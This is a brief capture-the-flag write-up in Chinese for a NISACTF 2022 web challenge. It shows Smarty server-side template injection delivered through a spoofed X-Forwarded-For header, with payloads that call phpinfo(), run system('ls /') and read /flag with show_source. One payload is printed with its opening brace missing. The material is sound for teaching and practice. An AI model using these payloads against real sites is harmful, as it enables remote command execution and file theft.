[NISACTF 2022]midlevel_代码007(未授权)

本文介绍: Smarty 模板注入;

进入页面，右上角显示了我的真实 IP ：
在这里插入图片描述

最下面提示：Build With Smarty ! ：

在这里插入图片描述

Smarty 是 PHP 的模板引擎，判断为 Smarty 模板注入。

抓包，添加 XFF 头为 127.0.0.1，测试回显：

{if phpinfo()}{/if}

if system('ls /')}{/if}

{if show_source('/flag')}{/if}

声明：本站所有文章，如无特殊说明或标注，均为本站原创发布。任何个人或组织，在未征得本站同意时，禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益，可联系我们进行处理。

CTF–Web安全–SQL注入之‘绕过方法’

互联网 1 年前 6

互联网 1 年前 4

小程序 1 年前 4

小程序 1 年前 6

互联网 1 年前 9

互联网 1 年前 8

互联网 1 年前 5

互联网 1 年前 6